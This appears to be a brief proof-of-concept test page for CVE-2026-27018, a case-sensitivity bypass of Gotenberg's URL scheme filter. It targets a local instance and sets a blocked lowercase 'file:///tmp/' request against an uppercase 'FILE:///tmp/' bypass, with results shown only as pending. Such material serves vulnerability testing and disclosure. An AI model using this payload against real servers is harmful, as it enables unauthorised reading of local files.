CVE-2026-27018: Gotenberg URL Scheme Bypass — devtest833201
Target: Gotenberg 8.23.2 @ localhost:3000 | POST /forms/chromium/convert/url
TEST 1: url=file:///tmp/ (lowercase = BLOCKED by filter)
pending...
TEST 2: url=FILE:///tmp/ (UPPERCASE = CVE-2026-27018 BYPASS)
pending...